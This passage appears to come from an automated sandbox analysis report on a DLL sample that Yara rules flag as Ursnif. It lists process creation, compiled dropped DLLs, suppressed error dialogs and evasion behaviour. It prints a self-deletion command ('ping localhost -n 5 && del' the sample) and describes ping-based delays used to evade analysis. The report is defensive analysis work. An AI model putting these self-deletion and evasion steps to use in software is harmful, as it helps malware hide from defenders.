                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.283526713.000000000040D000.00000002.00000001.01000000.00000003.sdmp, zs5n5sI6N2.dll
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.444837399.0000000006100000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.443008243.0000000006050000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.444837399.0000000006100000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.443008243.0000000006050000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0100828B push ecx; ret 3_2_0100829B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01007EA0 push ecx; ret 3_2_01007EA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B83D9F push ecx; ret 3_2_05B83DAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B63495 push ecx; mov dword ptr [esp], 00000002h3_2_05B63496
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B838A0 push ecx; ret 3_2_05B838A9
                      Source: C:\Windows\System32\control.exeCode function: 30_2_00814492 push ss; ret 30_2_00814493
                      Source: zs5n5sI6N2.dllStatic PE information: section name: .erloc
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B6EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,3_2_05B6EC00
                      Source: rn2v1u0v.dll.28.drStatic PE information: real checksum: 0x0 should be: 0x909a
                      Source: 0rxpcrxp.dll.32.drStatic PE information: real checksum: 0x0 should be: 0xaef5
                      Source: zs5n5sI6N2.dllStatic PE information: real checksum: 0x79835 should be: 0x721d2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.375616313.000000000509C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323251316.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373340776.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322813142.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324135232.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322932603.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.370749098.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323857679.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323438533.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
